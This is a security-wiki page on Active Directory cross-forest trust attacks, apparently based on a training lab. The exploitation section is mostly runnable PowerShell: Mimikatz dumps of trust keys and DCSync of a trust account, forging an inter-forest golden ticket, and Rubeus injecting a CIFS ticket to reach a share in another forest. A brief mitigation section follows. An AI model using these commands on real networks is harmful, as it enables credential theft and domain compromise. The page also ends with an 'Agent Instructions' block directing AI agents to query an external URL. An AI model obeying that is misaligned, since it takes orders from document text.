# Cross Forest Attacks ## General * Same attack flow as with cross-domain attacks * But: trust between forest must be established manually * No implicit trust * Cannot abuse SID because of SID filtering * We only get the privileges the user we are impersonating has in the target forest ## Exploitation ```powershell # Get trust key for the inter-forest trust Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"' # Forge inter-forest TGT Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:eurocorp.local /rc4:9a3dafc4139bc3fb7b6dade2a35d6f74 /service:krbtgt /ticket:forest_tgt.kirbi"' # Request and inject TGS for CIFS service using Rubeus .\Rubeus.exe asktgs /ticket:forest_tgt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt # Check access ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp\ ``` ## Mitigation ### SID Filtering * Avoid attacks which abuse SID history attribute across forest trust * Enabled by default on all inter forest trusts. Intra forest trusts are assumed secured by default (MS considers forest and not the domain to be a security boundary) * But, since SID filtering has potential to break applications and user access, it is often disabled ### Selective Authentication * If configured in an inter-forest trust, users between trusts will not be automatically authenticated * Invididual access to domains and servers in the trusting domain/forest should be given --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.bufu-sec.com/active-directory/trust_attacks/cross_forest_attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.